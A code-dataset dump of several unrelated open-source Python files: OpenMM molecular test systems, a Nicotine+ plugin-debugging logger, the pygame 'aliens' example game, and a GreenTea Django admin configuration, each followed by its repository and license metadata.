system = prmtop.createSystem(constraints=app.HBonds, nonbondedMethod=app.PME, rigidWater=True, nonbondedCutoff=0.9*units.nanometer)
# Set dispersion correction use.
forces = { system.getForce(index).__class__.__name__ : system.getForce(index) for index in range(system.getNumForces()) }
forces['NonbondedForce'].setUseDispersionCorrection(use_dispersion_correction)
# Read positions.
inpcrd = app.AmberInpcrdFile(crd_filename, loadBoxVectors=True)
positions = inpcrd.getPositions(asNumpy=True)
# Set box vectors.
box_vectors = inpcrd.getBoxVectors(asNumpy=True)
system.setDefaultPeriodicBoxVectors(box_vectors[0], box_vectors[1], box_vectors[2])
self.system, self.positions = system, positions
#=============================================================================================
# T4 lysozyme L99A mutant with p-xylene ligand.
#=============================================================================================
class LysozymeImplicit(TestSystem):
"""T4 lysozyme L99A (AMBER ff96) with p-xylene ligand (GAFF + AM1-BCC) in implicit OBC GBSA solvent.
Parameters
----------
flexibleConstraints : bool, optional, default=True
shake : string, optional, default="h-bonds"
Examples
--------
>>> lysozyme = LysozymeImplicit()
>>> (system, positions) = lysozyme.system, lysozyme.positions
"""
def __init__(self, flexibleConstraints=True, shake='h-bonds'):
# Determine prmtop and crd filenames in test directory.
# TODO: This will need to be revised in order to be able to find the test systems.
prmtop_filename = os.path.join(os.path.dirname(__file__), 'data', 'T4-lysozyme-L99A-implicit', 'complex.prmtop')
crd_filename = os.path.join(os.path.dirname(__file__), 'data', 'T4-lysozyme-L99A-implicit', 'complex.crd')
# Initialize system.
prmtop = app.AmberPrmtopFile(prmtop_filename)
system = prmtop.createSystem(implicitSolvent=app.OBC1, constraints=app.HBonds, nonbondedCutoff=None)
# Read positions.
inpcrd = app.AmberInpcrdFile(crd_filename)
positions = inpcrd.getPositions(asNumpy=True)
self.system, self.positions = system, positions
class SrcImplicit(TestSystem):
"""Src kinase in implicit AMBER 99sb-ildn with OBC GBSA solvent.
Examples
--------
>>> src = SrcImplicit()
>>> system, positions = src.system, src.positions
"""
def __init__(self):
# Determine prmtop and crd filenames in test directory.
# TODO: This will need to be revised in order to be able to find the test systems.
pdb_filename = os.path.join(os.path.dirname(__file__), 'data', 'src-implicit', 'implicit-refined.pdb')
# Read PDB.
pdbfile = app.PDBFile(pdb_filename)
# Construct system.
forcefields_to_use = ['amber99sbildn.xml', 'amber99_obc.xml'] # list of forcefields to use in parameterization
forcefield = app.ForceField(*forcefields_to_use)
system = forcefield.createSystem(pdbfile.topology, nonbondedMethod=app.NoCutoff, constraints=app.HBonds)
# Get positions.
positions = pdbfile.getPositions()
self.system, self.positions = system, positions
#=============================================================================================
# Src kinase in explicit solvent.
#=============================================================================================
class SrcExplicit(TestSystem):
"""Src kinase (AMBER 99sb-ildn) in explicit TIP3P solvent.
Examples
--------
>>> src = SrcExplicit()
>>> system, positions = src.system, src.positions
"""
def __init__(self):
# Determine prmtop and crd filenames in test directory.
# TODO: This will need to be revised in order to be able to find the test systems.
system_xml_filename = os.path.join(os.path.dirname(__file__), 'data', 'src-explicit', 'system.xml')
state_xml_filename = os.path.join(os.path.dirname(__file__), 'data', 'src-explicit', 'state.xml')
# Read system.
infile = open(system_xml_filename, 'r')
system = mm.XmlSerializer.deserialize(infile.read())
infile.close()
# Read state.
infile = open(state_xml_filename, 'r')
serialized_state = mm.XmlSerializer.deserialize(infile.read())
infile.close()
positions = serialized_state.getPositions()
box_vectors = serialized_state.getPeriodicBoxVectors()
system.setDefaultPeriodicBoxVectors(*box_vectors)
self.system, self.positions = system, positions
#=============================================================================================
# Methanol box.
#=============================================================================================
class MethanolBox(TestSystem):
"""Methanol box.
Parameters
----------
flexibleConstraints : bool, optional, default=True
shake : string, optional, default="h-bonds"
nonbondedCutoff : Quantity, optional, default=7.0 * units.angstroms
nonbondedMethod : str, optional, default="CutoffPeriodic"
Examples
--------
>>> methanol_box = MethanolBox()
>>> system, positions = methanol_box.system, methanol_box.positions
"""
def __init__(self, flexibleConstraints=True, shake='h-bonds', nonbondedCutoff=7.0 * units.angstroms, nonbondedMethod='CutoffPeriodic'):
# Determine prmtop and crd filenames in test directory.
# TODO: This will need to be revised in order to be able to find the test systems.
system_name = 'methanol-box'
prmtop_filename = os.path.join(os.path.dirname(__file__), 'data', system_name, system_name + '.prmtop')
crd_filename = os.path.join(os.path.dirname(__file__), 'data', system_name, system_name + '.crd')
# Initialize system.
prmtop = app.AmberPrmtopFile(prmtop_filename)
system = prmtop.createSystem(constraints=app.HBonds, nonbondedMethod=app.PME, rigidWater=True, nonbondedCutoff=0.9*units.nanometer)
# Read positions.
inpcrd = app.AmberInpcrdFile(crd_filename, loadBoxVectors=True)
positions = inpcrd.getPositions(asNumpy=True)
# Set box vectors.
box_vectors = inpcrd.getBoxVectors(asNumpy=True)
system.setDefaultPeriodicBoxVectors(box_vectors[0], box_vectors[1], box_vectors[2])
self.system, self.positions = system, positions
#=============================================================================================
# Molecular ideal gas (methanol box).
#=============================================================================================
class MolecularIdealGas(TestSystem):
"""Molecular ideal gas (methanol box).
Parameters
----------
flexibleConstraints : bool, optional, default=True
shake : string, optional, default=None
nonbondedCutoff : Quantity, optional, default=7.0 * units.angstroms
nonbondedMethod : str, optional, default="CutoffPeriodic"
Examples
--------
>>> methanol_box = MolecularIdealGas()
>>> system, positions = methanol_box.system, methanol_box.positions
"""
def __init__(self, flexibleConstraints=True, shake=None, nonbondedCutoff=7.0 * units.angstroms, nonbondedMethod='CutoffPeriodic'):
# Determine prmtop and crd filenames in test directory.
# TODO: This will need to be revised in order to be able to find the test systems.
system_name = 'methanol-box'
prmtop_filename = os.path.join(os.path.dirname(__file__), 'data', system_name, system_name + '.prmtop')
crd_filename = os.path.join(os.path.dirname(__file__), 'data', system_name, system_name + '.crd')
# Initialize system.
prmtop = app.AmberPrmtopFile(prmtop_filename)
reference_system = prmtop.createSystem(constraints=app.HBonds, nonbondedMethod=app.PME, rigidWater=True, nonbondedCutoff=0.9*units.nanometer)
# Make a new system that contains no intermolecular interactions.
system = mm.System()
# Add atoms.
for atom_index in range(reference_system.getNumParticles()):
mass = reference_system.getParticleMass(atom_index)
system.addParticle(mass)
# Add constraints
for constraint_index in range(reference_system.getNumConstraints()):
[iatom, jatom, r0] = reference_system.getConstraintParameters(constraint_index)
system.addConstraint(iatom, jatom, r0)
# Copy only intramolecular forces.
nforces = reference_system.getNumForces()
for force_index in range(nforces):
reference_force = reference_system.getForce(force_index)
if isinstance(reference_force, mm.HarmonicBondForce):
# HarmonicBondForce
force = mm.HarmonicBondForce()
for bond_index in range(reference_force.getNumBonds()):
[iatom, jatom, r0, K] = reference_force.getBondParameters(bond_index)
force.addBond(iatom, jatom, r0, K)
system.addForce(force)
elif isinstance(reference_force, mm.HarmonicAngleForce):
# HarmonicAngleForce
force = mm.HarmonicAngleForce()
for angle_index in range(reference_force.getNumAngles()):
[iatom, jatom, katom, theta0, Ktheta] = reference_force.getAngleParameters(angle_index)
force.addAngle(iatom, jatom, katom, theta0, Ktheta)
system.addForce(force)
elif isinstance(reference_force, mm.PeriodicTorsionForce):
# PeriodicTorsionForce
force = mm.PeriodicTorsionForce()
for torsion_index in range(reference_force.getNumTorsions()):
[particle1, particle2, particle3, particle4, periodicity, phase, k] = reference_force.getTorsionParameters(torsion_index)
force.addTorsion(particle1, particle2, particle3, particle4, periodicity, phase, k)
system.addForce(force)
else:
# Don't add any other forces.
pass
# Read positions.
inpcrd = app.AmberInpcrdFile(crd_filename, loadBoxVectors=True)
positions = inpcrd.getPositions(asNumpy=True)
# Set box vectors.
box_vectors = inpcrd.getBoxVectors(asNumpy=True)
system.setDefaultPeriodicBoxVectors(box_vectors[0], box_vectors[1], box_vectors[2])
self.system, self.positions = system, positions
#=============================================================================================
# System of particles with CustomGBForce
#=============================================================================================
class CustomGBForceSystem(TestSystem):
"""A system of particles with a CustomGBForce.
Notes
-----
This example comes from TestReferenceCustomGBForce.cpp from the OpenMM distribution.
Examples
--------
>>> gb_system = CustomGBForceSystem()
>>> system, positions = gb_system.system, gb_system.positions
"""
def __init__(self):
numMolecules = 70
numParticles = numMolecules*2
boxSize = 10.0 * units.nanometers
# Default parameters
mass = 39.9 * units.amu
sigma = 3.350 * units.angstrom
epsilon = 0.001603 * units.kilojoule_per_mole
cutoff = 2.0 * units.nanometers
system = mm.System()
for i in range(numParticles):
system.addParticle(mass)
system.setDefaultPeriodicBoxVectors(mm.Vec3(boxSize, 0.0, 0.0), mm.Vec3(0.0, boxSize, 0.0), mm.Vec3(0.0, 0.0, boxSize))
# Create NonbondedForce.
nonbonded = mm.NonbondedForce()
nonbonded.setNonbondedMethod(mm.NonbondedForce.CutoffPeriodic)
nonbonded.setCutoffDistance(cutoff)
# Create CustomGBForce.
custom = mm.CustomGBForce()
custom.setNonbondedMethod(mm.CustomGBForce.CutoffPeriodic)
custom.setCutoffDistance(cutoff)
custom.addPerParticleParameter("q")
custom.addPerParticleParameter("radius")
custom.addPerParticleParameter("scale")
custom.addGlobalParameter("solventDielectric", 80.0)
custom.addGlobalParameter("soluteDielectric", 1.0)
custom.addComputedValue("I", "step(r+sr2-or1)*0.5*(1/L-1/U+0.25*(1/U^2-1/L^2)*(r-sr2*sr2/r)+0.5*log(L/U)/r+C);"
"U=r+sr2;"
"C=2*(1/or1-1/L)*step(sr2-r-or1);"
"L=max(or1, D);"
"D=abs(r-sr2);"
"sr2 = scale2*or2;"
"or1 = radius1-0.009; or2 = radius2-0.009", mm.CustomGBForce.ParticlePairNoExclusions);
custom.addComputedValue("B", "1/(1/or-tanh(1*psi-0.8*psi^2+4.85*psi^3)/radius);"
"psi=I*or; or=radius-0.009", mm.CustomGBForce.SingleParticle);
custom.addEnergyTerm("28.3919551*(radius+0.14)^2*(radius/B)^6-0.5*138.935485*(1/soluteDielectric-1/solventDielectric)*q^2/B", mm.CustomGBForce.SingleParticle);
custom.addEnergyTerm("-138.935485*(1/soluteDielectric-1/solventDielectric)*q1*q2/f;"
"f=sqrt(r^2+B1*B2*exp(-r^2/(4*B1*B2)))", mm.CustomGBForce.ParticlePairNoExclusions);
# Add particles.
for i in range(numMolecules):
if (i < numMolecules/2):
charge = 1.0 * units.elementary_charge
radius = 0.2 * units.nanometers
scale = 0.5
nonbonded.addParticle(charge, sigma, epsilon)
custom.addParticle([charge, radius, scale])
charge = -1.0 * units.elementary_charge
radius = 0.1 * units.nanometers
scale = 0.5
nonbonded.addParticle(charge, sigma, epsilon)
custom.addParticle([charge, radius, scale]);
else:
charge = 1.0 * units.elementary_charge
radius = 0.2 * units.nanometers
scale = 0.8
nonbonded.addParticle(charge, sigma, epsilon)
custom.addParticle([charge, radius, scale])
charge = -1.0 * units.elementary_charge
radius = 0.1 * units.nanometers
scale = 0.8
nonbonded.addParticle(charge, sigma, epsilon)
custom.addParticle([charge, radius, scale]);
system.addForce(nonbonded)
system.addForce(custom)
# Place particles at random positions within the box.
# TODO: Use reproducible random number seed.
# NOTE: This may not be thread-safe.
state = np.random.get_state()
np.random.seed(0)
positions = units.Quantity((boxSize/units.nanometer) * np.random.rand(numParticles,3), units.nanometer)
np.random.set_state(state)
self.system, self.positions = system, positions
#=============================================================================================
# Definte dest system names
#=============================================================================================
testsystem_classes = [cls for cls in vars()['TestSystem'].__subclasses__()]
#=============================================================================================
# MAIN AND TESTS
#=============================================================================================
if __name__ == "__main__":
# Run doctests.
import doctest
doctest.testmod()
# Make sure all advertised analytical properties can be computed.
import simtk.unit as u
state = ThermodynamicState(temperature=300.0*u.kelvin, pressure=1.0*u.atmosphere)
testsystem_classes = [cls for cls in vars()['TestSystem'].__subclasses__()]
print "Testing analytical property computation:"
for testsystem_class in testsystem_classes:
class_name = testsystem_class.__name__
testsystem = testsystem_class()
property_list = testsystem.analytical_properties
if len(property_list) > 0:
for property_name in property_list:
method = getattr(testsystem, 'get_' + property_name)
print "%32s . %32s : %32s" % (class_name, property_name, str(method(state)))
|
gpl-2.0
|
eLvErDe/nicotine-plus
|
plugins/plugindebugger/__init__.py
|
1
|
3009
|
from pynicotine.pluginsystem import BasePlugin
def enable(plugins):
global PLUGIN
PLUGIN = Plugin(plugins)
def disable(plugins):
global PLUGIN
PLUGIN = None
class Plugin(BasePlugin):
__name__ = "Plugin Debugger"
__version__ = "2009-05-27r00"
__author__ = "quinox"
__desc__ = """Plugin to examine the flow of events of the plugin system. Not useful if you're not a programmer."""
def init(self):
self.log('init')
def LoadNotification(self):
self.log('LoadNotification')
pass
def IncomingPrivateChatEvent(self, user, line):
self.log('IncomingPrivateChatEvent user=%s, line=%s' % (user, line))
pass
def IncomingPrivateChatNotification(self, user, line):
self.log('IncomingPrivateChatNotification, user=%s, line=%s' % (user, line))
pass
def IncomingPublicChatEvent(self, room, user, line):
self.log('IncomingPublicChatEvent, room=%s, user=%s, line=%s' % (room, user, line))
pass
def IncomingPublicChatNotification(self, room, user, line):
self.log('IncomingPublicChatNotification, room=%s, user=%s, line=%s' % (room, user, line))
pass
def OutgoingPrivateChatEvent(self, user, line):
self.log('OutgoingPrivateChatEvent, user=%s, line=%s' % (user, line))
pass
def OutgoingPrivateChatNotification(self, user, line):
self.log('OutgoingPrivateChatNotification, user=%s, line=%s' % (room, line)) # noqa: F821
pass
def OutgoingPublicChatEvent(self, room, line):
self.log('OutgoingPublicChatEvent, room=%s, line=%s' % (room, line))
pass
def OutgoingPublicChatNotification(self, room, line):
self.log('OutgoingPublicChatNotification, room=%s, line=%s' % (room, line))
pass
def OutgoingGlobalSearchEvent(self, text):
self.log('OutgoingGlobalSearchEvent, text=%s' % (text,))
pass
def OutgoingRoomSearchEvent(self, rooms, text):
self.log('OutgoingRoomSearchEvent, rooms=%s, text=%s' % (rooms, text))
pass
def OutgoingBuddySearchEvent(self, text):
self.log('OutgoingBuddySearchEvent, text=%s' % (text,))
pass
def OutgoingUserSearchEvent(self, users):
self.log('OutgoingUserSearchEvent, users=%s' % (users,))
pass
def UserResolveNotification(self, user, ip, port, country):
self.log('UserResolveNotification, user=%s, ip=%s, port=%s, country=%s' % (user, ip, port, country))
pass
def ServerConnectNotification(self):
self.log('ServerConnectNotification')
pass
def ServerDisconnectNotification(self, userchoice):
self.log('ServerDisconnectNotification, userchoice=%s' % (userchoice,))
pass
def JoinChatroomNotification(self, room):
self.log('JoinChatroomNotification, room=%s' % (room,))
pass
def LeaveChatroomNotification(self, room):
self.log('LeaveChatroomNotification, room=%s' % (room,))
pass
|
gpl-3.0
|
kenshay/ImageScripter
|
ProgramData/SystemFiles/Python/Lib/site-packages/pygame/examples/macosx/aliens_app_example/aliens.py
|
17
|
9634
|
#! /usr/bin/env python
import random, os.path
#import basic pygame modules
import pygame
from pygame.locals import *
#see if we can load more than standard BMP
if not pygame.image.get_extended():
raise SystemExit("Sorry, extended image module required")
#game constants
MAX_SHOTS = 2 #most player bullets onscreen
ALIEN_ODDS = 22 #chances a new alien appears
BOMB_ODDS = 60 #chances a new bomb will drop
ALIEN_RELOAD = 12 #frames between new aliens
SCREENRECT = Rect(0, 0, 640, 480)
SCORE = 0
def load_image(file):
"loads an image, prepares it for play"
file = os.path.join('data', file)
try:
surface = pygame.image.load(file)
except pygame.error:
raise SystemExit('Could not load image "%s" %s'%(file, pygame.get_error()))
return surface.convert()
def load_images(*files):
imgs = []
for file in files:
imgs.append(load_image(file))
return imgs
class dummysound:
def play(self): pass
def load_sound(file):
if not pygame.mixer: return dummysound()
file = os.path.join('data', file)
try:
sound = pygame.mixer.Sound(file)
return sound
except pygame.error:
print ('Warning, unable to load,', file)
return dummysound()
# each type of game object gets an init and an
# update function. the update function is called
# once per frame, and it is when each object should
# change it's current position and state. the Player
# object actually gets a "move" function instead of
# update, since it is passed extra information about
# the keyboard
class Player(pygame.sprite.Sprite):
speed = 10
bounce = 24
gun_offset = -11
images = []
def __init__(self):
pygame.sprite.Sprite.__init__(self, self.containers)
self.image = self.images[0]
self.rect = self.image.get_rect()
self.reloading = 0
self.rect.centerx = SCREENRECT.centerx
self.rect.bottom = SCREENRECT.bottom - 1
self.origtop = self.rect.top
self.facing = -1
def move(self, direction):
if direction: self.facing = direction
self.rect.move_ip(direction*self.speed, 0)
self.rect = self.rect.clamp(SCREENRECT)
if direction < 0:
self.image = self.images[0]
elif direction > 0:
self.image = self.images[1]
self.rect.top = self.origtop - (self.rect.left/self.bounce%2)
def gunpos(self):
pos = self.facing*self.gun_offset + self.rect.centerx
return pos, self.rect.top
class Alien(pygame.sprite.Sprite):
speed = 13
animcycle = 12
images = []
def __init__(self):
pygame.sprite.Sprite.__init__(self, self.containers)
self.image = self.images[0]
self.rect = self.image.get_rect()
self.facing = random.choice((-1,1)) * Alien.speed
self.frame = 0
if self.facing < 0:
self.rect.right = SCREENRECT.right
def update(self):
self.rect.move_ip(self.facing, 0)
if not SCREENRECT.contains(self.rect):
self.facing = -self.facing;
self.rect.top = self.rect.bottom + 1
self.rect = self.rect.clamp(SCREENRECT)
self.frame = self.frame + 1
self.image = self.images[self.frame/self.animcycle%3]
class Explosion(pygame.sprite.Sprite):
defaultlife = 12
animcycle = 3
images = []
def __init__(self, actor):
pygame.sprite.Sprite.__init__(self, self.containers)
self.image = self.images[0]
self.rect = self.image.get_rect()
self.life = self.defaultlife
self.rect.center = actor.rect.center
def update(self):
self.life = self.life - 1
self.image = self.images[self.life/self.animcycle%2]
if self.life <= 0: self.kill()
class Shot(pygame.sprite.Sprite):
speed = -11
images = []
def __init__(self, pos):
pygame.sprite.Sprite.__init__(self, self.containers)
self.image = self.images[0]
self.rect = self.image.get_rect()
self.rect.midbottom = pos
def update(self):
self.rect.move_ip(0, self.speed)
if self.rect.top <= 0:
self.kill()
class Bomb(pygame.sprite.Sprite):
speed = 9
images = []
def __init__(self, alien):
pygame.sprite.Sprite.__init__(self, self.containers)
self.image = self.images[0]
self.rect = self.image.get_rect()
self.rect.centerx = alien.rect.centerx
self.rect.bottom = alien.rect.bottom + 5
def update(self):
self.rect.move_ip(0, self.speed)
if self.rect.bottom >= 470:
Explosion(self)
self.kill()
class Score(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.font = pygame.font.Font(None, 20)
self.font.set_italic(1)
self.color = Color('white')
self.lastscore = -1
self.update()
self.rect = self.image.get_rect().move(10, 450)
def update(self):
if SCORE != self.lastscore:
self.lastscore = SCORE
msg = "Score: %d" % SCORE
self.image = self.font.render(msg, 0, self.color)
def main(winstyle = 0):
# Initialize pygame
pygame.init()
if pygame.mixer and not pygame.mixer.get_init():
print ('Warning, no sound')
pygame.mixer = None
# Set the display mode
winstyle = 0 # |FULLSCREEN
bestdepth = pygame.display.mode_ok(SCREENRECT.size, winstyle, 32)
screen = pygame.display.set_mode(SCREENRECT.size, winstyle, bestdepth)
#Load images, assign to sprite classes
#(do this before the classes are used, after screen setup)
img = load_image('player1.gif')
Player.images = [img, pygame.transform.flip(img, 1, 0)]
img = load_image('explosion1.gif')
Explosion.images = [img, pygame.transform.flip(img, 1, 1)]
Alien.images = load_images('alien1.gif', 'alien2.gif', 'alien3.gif')
Bomb.images = [load_image('bomb.gif')]
Shot.images = [load_image('shot.gif')]
#decorate the game window
icon = pygame.transform.scale(Alien.images[0], (32, 32))
pygame.display.set_icon(icon)
pygame.display.set_caption('Pygame Aliens')
pygame.mouse.set_visible(0)
#create the background, tile the bgd image
bgdtile = load_image('background.gif')
background = pygame.Surface(SCREENRECT.size)
for x in range(0, SCREENRECT.width, bgdtile.get_width()):
background.blit(bgdtile, (x, 0))
screen.blit(background, (0,0))
pygame.display.flip()
#load the sound effects
boom_sound = load_sound('boom.wav')
shoot_sound = load_sound('car_door.wav')
if pygame.mixer and pygame.mixer.music:
music = os.path.join('data', 'house_lo.wav')
pygame.mixer.music.load(music)
pygame.mixer.music.play(-1)
# Initialize Game Groups
aliens = pygame.sprite.Group()
shots = pygame.sprite.Group()
bombs = pygame.sprite.Group()
all = pygame.sprite.RenderUpdates()
lastalien = pygame.sprite.GroupSingle()
#assign default groups to each sprite class
Player.containers = all
Alien.containers = aliens, all, lastalien
Shot.containers = shots, all
Bomb.containers = bombs, all
Explosion.containers = all
Score.containers = all
#Create Some Starting Values
global score
alienreload = ALIEN_RELOAD
kills = 0
clock = pygame.time.Clock()
#initialize our starting sprites
global SCORE
player = Player()
Alien() #note, this 'lives' because it goes into a sprite group
if pygame.font:
all.add(Score())
while player.alive():
#get input
for event in pygame.event.get():
if event.type == QUIT or \
(event.type == KEYDOWN and event.key == K_ESCAPE):
return
keystate = pygame.key.get_pressed()
# clear/erase the last drawn sprites
all.clear(screen, background)
#update all the sprites
all.update()
#handle player input
direction = keystate[K_RIGHT] - keystate[K_LEFT]
player.move(direction)
firing = keystate[K_SPACE]
if not player.reloading and firing and len(shots) < MAX_SHOTS:
Shot(player.gunpos())
shoot_sound.play()
player.reloading = firing
# Create new alien
if alienreload:
alienreload = alienreload - 1
elif not int(random.random() * ALIEN_ODDS):
Alien()
alienreload = ALIEN_RELOAD
# Drop bombs
if lastalien and not int(random.random() * BOMB_ODDS):
Bomb(lastalien.sprite)
# Detect collisions
for alien in pygame.sprite.spritecollide(player, aliens, 1):
boom_sound.play()
Explosion(alien)
Explosion(player)
SCORE = SCORE + 1
player.kill()
for alien in pygame.sprite.groupcollide(shots, aliens, 1, 1).keys():
boom_sound.play()
Explosion(alien)
SCORE = SCORE + 1
for bomb in pygame.sprite.spritecollide(player, bombs, 1):
boom_sound.play()
Explosion(player)
Explosion(bomb)
player.kill()
#draw the scene
dirty = all.draw(screen)
pygame.display.update(dirty)
#cap the framerate
clock.tick(40)
if pygame.mixer and pygame.mixer.music:
pygame.mixer.music.fadeout(1000)
pygame.time.wait(1000)
#call the "main" function if running this script
if __name__ == '__main__': main()
|
gpl-3.0
|
lhellebr/GreenTea
|
apps/core/admin.py
|
2
|
10226
|
#!/bin/python
# -*- coding: utf-8 -*-
# Author: Pavel Studenik
# Email: [email protected]
# Date: 24.9.2013
import reversion
from django.contrib import admin
from django.core.urlresolvers import reverse
from models import (Arch, Author, CheckProgress, Distro, DistroTemplate, Event,
FileLog, Git, GroupOwner, GroupTaskTemplate, GroupTemplate,
GroupTestTemplate, Job, JobTemplate, PhaseLabel,
PhaseResult, Recipe, RecipeTemplate, System, Task,
TaskRoleEnum, TaskTemplate, Test, TestHistory)
class TemplateTaskInLine(admin.TabularInline):
model = TaskTemplate
raw_id_fields = ("test", )
sortable_field_name = "priority"
ordering = ["position", "priority"]
extra = 0
class RecipeInLine(admin.TabularInline):
model = Recipe
extra = 0
fields = ["get_recipe_link", "whiteboard", "status",
"system", "arch", "distro", "result", "resultrate"]
readonly_fields = ["get_recipe_link", "status",
"system", "arch", "distro", "result", "resultrate"]
def get_recipe_link(self, obj):
url = reverse('admin:core_recipe_change', args=(obj.pk,))
return '<a href="%s">%s</a>' % (url, obj.uid)
get_recipe_link.allow_tags = True
class RecipeTemplateInLineSmall(admin.TabularInline):
model = RecipeTemplate
extra = 0
fields = ("get_recipe_link", "is_enabled", "name",
"is_virtualguest", ("role", "arch"), "distro",)
readonly_fields = ("get_recipe_link", "is_enabled", "arch")
def is_enabled(self, obj):
return obj.is_enabled()
is_enabled.boolean = True
def get_recipe_link(self, obj):
url = reverse('admin:core_recipetemplate_change', args=(obj.pk,))
return '<a href="%s">%s</a>' % (url, obj.id)
get_recipe_link.allow_tags = True
class RecipeTemplateInLine(RecipeTemplateInLineSmall):
fields = ("get_recipe_link", "name", "is_virtualguest",
"role", "arch", "distro", "schedule")
readonly_fields = ("get_recipe_link", )
class TaskInLine(admin.TabularInline):
model = Task
extra = 0
fields = ("uid", "test", "status",
"result", "duration", "datestart", "alias")
readonly_fields = fields
class DistroTemplateAdmin(reversion.VersionAdmin):
list_display = ("name", "distroname",
"variant", "family", "tpljobs_counter")
ordering = ("name",)
inlines = [RecipeTemplateInLineSmall]
class JobAdmin(admin.ModelAdmin):
list_display = ("uid", "template", "date", "is_running", )
search_fields = ["uid", "template__whiteboard"]
ordering = ["-date", "-is_running", ]
inlines = [RecipeInLine]
class RecipeAdmin(admin.ModelAdmin):
list_display = ("uid", "get_job_link", "whiteboard", "get_template",
"get_system_link", "result", "status", "resultrate")
search_fields = ["uid", "whiteboard"]
raw_id_fields = ("job", "system", "distro", "parentrecipe")
# readonly_fields = ("job", "system", "distro")
inlines = [TaskInLine]
def get_system_link(self, obj):
url = reverse('admin:core_system_change', args=(obj.system_id,))
return '<a href="%s">%s</a>' % (url, obj.system)
get_system_link.allow_tags = True
def get_job_link(self, obj):
url = reverse('admin:core_job_change', args=(obj.job_id,))
return '<a href="%s">%s</a>' % (url, obj.job)
get_job_link.allow_tags = True
class TaskAdmin(admin.ModelAdmin):
list_display = ("uid", "recipe", "test", "status",
"duration", "datestart", "result")
search_fields = ["uid"]
raw_id_fields = ("recipe", "test")
class TaskTemplateInLine(admin.TabularInline):
model = TaskTemplate
extra = 0
fields = ("get_recipetemplate_link", "jobtemplate")
readonly_fields = fields
def get_queryset(self, request):
qs = super(TaskTemplateInLine, self).get_queryset(request)
return qs.filter(recipe__jobtemplate__is_enable=True)
def jobtemplate(self, obj):
return "%s" % obj.recipe.jobtemplate
def get_recipetemplate_link(self, obj):
url = reverse('admin:core_recipetemplate_change',
args=(obj.recipe.pk,))
return '<a href="%s">%s</a>' % (url, obj.recipe.id)
get_recipetemplate_link.allow_tags = True
class TestAdmin(admin.ModelAdmin):
list_display = ("name", "owner", "is_enable")
search_fields = ["name", "owner__email"]
filter_horizontal = ["dependencies", "groups"]
def ownerName(self, obj):
return obj.owner.name
def ownerEmail(self, obj):
return obj.owner.email
inlines = [TaskTemplateInLine]
class TestHistoryAdmin(admin.ModelAdmin):
list_display = ("test", "author", "commit", "date")
class AuthorAdmin(admin.ModelAdmin):
list_display = ("name", "is_enabled", "email")
class CheckProgressAdmin(admin.ModelAdmin):
list_display = ("datestart", "dateend",
"percent", "totalsum", "get_duration")
class GitAdmin(admin.ModelAdmin):
list_display = ("name", "url", "localurl", "get_count")
class JobTemplateAdmin(admin.ModelAdmin):
list_display = (
"whiteboard", "is_enable", "schedule", "get_tags", "position")
def make_enable(modeladmin, request, queryset):
queryset.update(is_enable=True)
make_enable.short_description = "Set selected templates to enabled"
def make_disable(modeladmin, request, queryset):
queryset.update(is_enable=False)
make_disable.short_description = "Set selected templates to disabled"
def make_clone(modeladmin, request, queryset):
for it in queryset:
it.clone()
make_clone.short_description = "Clone selected jobs"
actions = [make_enable, make_disable, make_clone]
# 'position' is the name of the model field which holds the position of an element
list_editable = ('position',)
list_filter = ["schedule", "is_enable"]
search_fields = ["whiteboard", ]
ordering = ["-is_enable", "schedule", "position"]
inlines = [RecipeTemplateInLine]
class GroupTestInLine(admin.TabularInline):
model = GroupTestTemplate
extra = 0
raw_id_fields = ("test", )
sortable_field_name = "priority"
ordering = ["priority"]
class GrupRecipeTemaplate(admin.TabularInline):
model = GroupTaskTemplate
fields = ("get_recipe_link", "recipe", "jobtemplate")
readonly_fields = fields
extra = 0
def jobtemplate(self, obj):
return obj.recipe.jobtemplate
def get_recipe_link(self, obj):
url = reverse('admin:core_recipetemplate_change',
args=(obj.recipe.pk,))
return '<a href="%s">%s</a>' % (url, obj.recipe.id)
get_recipe_link.allow_tags = True
class GroupTaskInLine(admin.TabularInline):
model = GroupTaskTemplate
extra = 0
sortable_field_name = "priority"
fields = ("get_group_link", "group", "params", "role", "priority",)
readonly_fields = ("get_group_link", )
def get_group_link(self, obj):
url = reverse('admin:core_grouptemplate_change', args=(obj.group.pk,))
return '<a href="%s">%s</a>' % (url, obj.group.id)
get_group_link.allow_tags = True
class GroupTemplateAdmin(admin.ModelAdmin):
search_fields = ["name", ]
inlines = [GroupTestInLine, GrupRecipeTemaplate]
def make_clone(modeladmin, request, queryset):
for it in queryset:
it.clone()
make_clone.short_description = "Clone selected groups"
actions = [make_clone, ]
class GroupOwnerAdmin(admin.ModelAdmin):
filter_horizontal = ["owners", ]
class TaskTemplateAdmin(admin.ModelAdmin):
list_display = ("id", "test", "recipe")
class RecipeTemplateAdmin(admin.ModelAdmin):
list_display = ("__unicode__", "jobtemplate", "distro", "archs", "hvm")
inlines = [GroupTaskInLine, TemplateTaskInLine]
search_fields = ["name", "jobtemplate__whiteboard"]
readonly_fields = ("get_jobtemplate_link", )
fieldsets = (
(None, {
'fields': (('get_jobtemplate_link', 'jobtemplate'), 'name', ('distro', 'arch',), 'hvm', ('is_virtualguest', 'virtualhost'),
'role', 'memory', 'disk', 'hostname', 'params', 'schedule')
}),
('Kernel options', {
'fields': ('kernel_options', 'kernel_options_post', 'ks_meta',),
}),
)
def get_jobtemplate_link(self, obj):
url = reverse('admin:core_jobtemplate_change',
args=(obj.jobtemplate.pk,))
return '<a href="%s">%s</a>' % (url, obj.jobtemplate)
get_jobtemplate_link.allow_tags = True
def render_change_form(self, request, context, *args, **kwargs):
if kwargs.get("obj", None):
context['adminform'].form.fields['virtualhost'].queryset = RecipeTemplate.objects\
.filter(jobtemplate=kwargs["obj"].jobtemplate, is_virtualguest=False)\
.exclude(id=kwargs["obj"].id)
return super(RecipeTemplateAdmin, self).render_change_form(
request, context, args, kwargs)
class FileLogAdmin(admin.ModelAdmin):
list_display = ("recipe", "task", "path", "created",
"is_downloaded", "is_indexed", "status_code")
raw_id_fields = ("recipe", "task")
admin.site.register(Job, JobAdmin)
admin.site.register(Recipe, RecipeAdmin)
admin.site.register(PhaseResult)
admin.site.register(PhaseLabel)
admin.site.register(Test, TestAdmin)
admin.site.register(Task, TaskAdmin)
admin.site.register(System)
admin.site.register(Arch)
admin.site.register(Event)
admin.site.register(Distro)
admin.site.register(Git, GitAdmin)
admin.site.register(Author, AuthorAdmin)
admin.site.register(TestHistory, TestHistoryAdmin)
admin.site.register(GroupOwner, GroupOwnerAdmin)
